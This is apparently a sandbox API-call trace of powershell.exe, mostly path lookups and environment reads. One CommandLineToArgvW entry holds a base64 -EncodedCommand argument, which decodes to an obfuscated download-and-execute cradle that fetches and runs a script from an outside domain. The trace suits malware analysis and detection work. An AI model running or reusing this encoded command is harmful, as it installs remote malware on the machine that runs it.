	[0438.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.725] SetErrorMode (uMode=0x1) returned 0x1
	[0438.726] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.726] SetErrorMode (uMode=0x1) returned 0x1
	[0438.726] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.726] SetErrorMode (uMode=0x1) returned 0x1
	[0438.726] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.726] SetErrorMode (uMode=0x1) returned 0x1
	[0438.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.727] SetErrorMode (uMode=0x1) returned 0x1
	[0438.727] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.727] SetErrorMode (uMode=0x1) returned 0x1
	[0438.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.727] SetErrorMode (uMode=0x1) returned 0x1
	[0438.727] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.728] SetErrorMode (uMode=0x1) returned 0x1
	[0438.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.728] SetErrorMode (uMode=0x1) returned 0x1
	[0438.728] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.728] SetErrorMode (uMode=0x1) returned 0x1
	[0438.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.728] SetErrorMode (uMode=0x1) returned 0x1
	[0438.729] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.729] SetErrorMode (uMode=0x1) returned 0x1
	[0438.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.729] SetErrorMode (uMode=0x1) returned 0x1
	[0438.729] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.729] SetErrorMode (uMode=0x1) returned 0x1
	[0438.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.730] SetErrorMode (uMode=0x1) returned 0x1
	[0438.730] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.730] SetErrorMode (uMode=0x1) returned 0x1
	[0438.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.730] SetErrorMode (uMode=0x1) returned 0x1
	[0438.730] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.731] SetErrorMode (uMode=0x1) returned 0x1
	[0438.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.731] SetErrorMode (uMode=0x1) returned 0x1
	[0438.731] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.731] SetErrorMode (uMode=0x1) returned 0x1
	[0438.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.731] SetErrorMode (uMode=0x1) returned 0x1
	[0438.731] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.732] SetErrorMode (uMode=0x1) returned 0x1
	[0438.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.732] SetErrorMode (uMode=0x1) returned 0x1
	[0438.732] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.732] SetErrorMode (uMode=0x1) returned 0x1
	[0438.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.733] SetErrorMode (uMode=0x1) returned 0x1
	[0438.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.733] SetErrorMode (uMode=0x1) returned 0x1
	[0438.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.733] SetErrorMode (uMode=0x1) returned 0x1
	[0438.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.733] SetErrorMode (uMode=0x1) returned 0x1
	[0438.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.734] SetErrorMode (uMode=0x1) returned 0x1
	[0438.734] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.734] SetErrorMode (uMode=0x1) returned 0x1
	[0438.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.734] SetErrorMode (uMode=0x1) returned 0x1
	[0438.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.735] SetErrorMode (uMode=0x1) returned 0x1
	[0438.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.735] SetErrorMode (uMode=0x1) returned 0x1
	[0438.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.735] SetErrorMode (uMode=0x1) returned 0x1
	[0438.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.736] SetErrorMode (uMode=0x1) returned 0x1
	[0438.736] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.736] SetErrorMode (uMode=0x1) returned 0x1
	[0438.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.736] SetErrorMode (uMode=0x1) returned 0x1
	[0438.736] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.737] SetErrorMode (uMode=0x1) returned 0x1
	[0438.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.737] SetErrorMode (uMode=0x1) returned 0x1
	[0438.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.737] SetErrorMode (uMode=0x1) returned 0x1
	[0439.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0439.081] SetErrorMode (uMode=0x1) returned 0x1
	[0439.081] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.081] SetErrorMode (uMode=0x1) returned 0x1
	[0439.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0439.082] SetErrorMode (uMode=0x1) returned 0x1
	[0439.082] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x17f370
	[0439.083] FindNextFileW (in: hFindFile=0x17f370, lpFindFileData=0x1c9ddaf0 | out: lpFindFileData=0x1c9ddaf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0439.083] FindClose (in: hFindFile=0x17f370 | out: hFindFile=0x17f370) returned 1
	[0439.083] SetErrorMode (uMode=0x1) returned 0x1
	[0439.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c9ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0439.084] SetErrorMode (uMode=0x1) returned 0x1
	[0439.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9dde10 | out: lpFileInformation=0x1c9dde10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0439.084] SetErrorMode (uMode=0x1) returned 0x1
	[0439.085] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0439.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0439.085] CoTaskMemFree (pv=0x1b9a98c0) 
	[0439.087] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0439.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0439.087] CoTaskMemFree (pv=0x1b9a98c0) 
	[0439.090] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0439.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0439.090] CoTaskMemFree (pv=0x1b9a98c0) 
	[0439.101] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0439.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0439.101] CoTaskMemFree (pv=0x1b9a98c0) 
	[0439.116] CoTaskMemAlloc (cb=0x3b) returned 0x1b9c58f0
	[0439.116] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c9ddff8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9ddff8) returned 0x4550
	[0439.117] CoTaskMemFree (pv=0x1b9c58f0) 
	[0439.120] GetConsoleWindow () returned 0x102f8
	[0439.494] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0439.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0439.494] CoTaskMemFree (pv=0x1b9a98c0) 
	[0439.495] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0439.495] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0439.495] CoTaskMemFree (pv=0x1b9a98c0) 
	[0439.500] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0439.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0439.501] CoTaskMemFree (pv=0x1b9a98c0) 
	[0439.503] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c9de040 | out: pNumArgs=0x1c9de040) returned 0x1b9d5020*=""
	[0439.504] lstrlenW (lpString="-EncodedCommand") returned 15
	[0439.505] CoTaskMemAlloc (cb=0x22) returned 0x1b9bf6a0
	[0439.505] RtlMoveMemory (in: Destination=0x1b9bf6a0, Source=0x1b9d5042, Length=0x20 | out: Destination=0x1b9bf6a0) 
	[0439.505] CoTaskMemFree (pv=0x1b9bf6a0) 
	[0439.505] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0439.505] CoTaskMemAlloc (cb=0x2f4) returned 0x1b9d7bd0
	[0439.505] RtlMoveMemory (in: Destination=0x1b9d7bd0, Source=0x1b9d5062, Length=0x2f2 | out: Destination=0x1b9d7bd0) 
	[0439.505] CoTaskMemFree (pv=0x1b9d7bd0) 
	[0439.506] LocalFree (hMem=0x1b9d5020) returned 0x0
	[0439.507] CoTaskMemAlloc (cb=0x804) returned 0x1b9c7f60
	[0439.507] GetConsoleTitleW (in: lpConsoleTitle=0x1b9c7f60, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0439.507] CoTaskMemFree (pv=0x1b9c7f60) 
	[0439.516] CoTaskMemAlloc (cb=0x38e) returned 0x1b9d5020
